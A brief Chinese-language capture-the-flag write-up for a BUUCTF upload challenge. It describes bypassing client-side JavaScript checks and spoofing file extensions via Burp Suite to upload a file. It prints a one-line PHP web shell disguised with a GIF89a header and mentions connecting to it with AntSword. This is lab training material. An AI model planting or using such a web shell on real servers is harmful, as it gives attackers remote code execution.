Buuctf-web-[ACTF2020 新生赛]Upload

这个题我有两个思路。

1.绕过前端Js验证，phtml拓展名的应用

首先打开之后，写一个phtml文件

GIF89a
<script language="php">eval($_POST['shell']);</script> 

 

 

发现不允许上传phtml文件

 

 猜想有js验证

F12查看

 

 果然，将其删除

 

 蚁剑连接，

 

 根目录有flag.

 

2.php别名绕过

随意上传一个a.jpg,bp抓包，修改后缀名，改码，添加代码，放回

 

 

 

 

 

 蚁剑链接，根目录，flag